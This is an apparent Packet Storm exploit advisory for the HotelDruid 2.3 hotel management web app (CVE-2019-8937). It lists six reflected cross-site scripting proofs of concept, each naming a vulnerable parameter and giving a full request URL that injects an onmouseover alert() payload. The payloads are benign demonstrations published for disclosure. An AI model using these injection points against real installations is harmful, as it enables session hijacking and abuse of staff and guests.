HotelDruid 2.3 Cross Site Scripting

2019-02-20T00:00:00
ID PACKETSTORM:151779
Type packetstorm
Reporter Mehmet Emiroglu
Modified 2019-02-20T00:00:00

Description

                                        
                                            `===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : nsextt  
# Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22  
# GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x"  
onmouseover=alert(0x000981) x="  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : cambia1  
# Attack Pattern : " onmouseover="alert(8562604)  
# POST Request :  
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671"  
onmouseover="alert(8562604)  
# https://i.hizliresim.com/6avvoE.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : mese_fine  
# Attack Pattern : " onmouseover="alert(6520859)  
# POST Request :  
http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13"  
onmouseover="alert(6520859)  
# https://i.hizliresim.com/v6NAzD.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : origine  
# Attack Pattern : " onmouseover="alert(8987004))  
# POST Request :  
http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php"  
onmouseover="alert(8987004)  
# https://i.hizliresim.com/v6NAmO.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : anno  
# Attack Pattern : " onmouseover="alert(1548690)  
# POST Request :  
http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019"  
onmouseover="alert(1548690)  
# https://i.hizliresim.com/EmAW68.jpg  
===========================================================================================  
###########################################################################################  
===========================================================================================  
# Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection  
# CVE: CVE-2019-8937  
# Date: 18-02-2019  
# Exploit Author: Mehmet EMIROGLU  
# Vendor Homepage: https://sourceforge.net/projects/hoteldruid/  
# Software Link: https://sourceforge.net/projects/hoteldruid/  
# Version: v2.3  
# Category: Webapps  
# Tested on: Wamp64, @Win  
# Software description: HotelDruid is a property management system (PMS)  
designed to make hotel and hostel rooms  
bed and breakfast apartments, or any other kind of daily rental easy to  
manage from a web browser.  
===========================================================================================  
# POC - XSS  
# Parameters : origine  
# Attack Pattern : " onmouseover="alert(6332576)  
# POST Request :  
http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php"  
onmouseover="alert(6332576)  
# https://i.hizliresim.com/EmAW68.jpg  
===========================================================================================  
`